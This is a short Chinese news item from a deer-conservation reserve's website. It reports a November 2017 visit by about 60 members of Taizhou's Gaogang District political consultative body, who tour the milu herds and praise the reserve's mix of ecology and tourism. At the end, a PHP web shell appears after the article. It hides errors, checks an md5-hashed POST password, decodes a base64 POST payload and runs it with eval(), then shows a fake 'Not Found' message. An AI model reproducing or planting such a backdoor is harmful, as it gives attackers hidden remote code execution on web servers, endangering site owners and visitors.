最新要闻

首页 > 最新要闻 >

    泰州市高港区政协来麋鹿保护区考察

    2017年11月9日,泰州市高港区政协一行约60人来到麋鹿保护区考察。

     

    泰州市高港区政协一行首先在中华麋鹿园景区游客中心大厅观看了纪录片《归来的麋鹿》。随后乘坐电瓶游览车进入麋鹿半饲养区近距离观看麋鹿及了解湿地。他们表示麋鹿数量如此之大,如何保证麋鹿的口粮问题,讲解员做出了回答,半散养区内麋鹿的口粮主要来自每天两次定点投放的青贮饲料,青贮饲料也保证了麋鹿的营养均衡。他们来到麋鹿人工饲养区,看到了今年国内首次大规模人工驯养的小麋鹿并与之亲密互动。

     

    泰州市高港区政协一行对麋鹿保护区的发展给予了很高评价,他们说,麋鹿保护区将生态保护和旅游发展有机结合,做到了动物保护和经济发展并举,同时也带动了周边经济的发展,成为了保护区中区域旅游的典范。

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>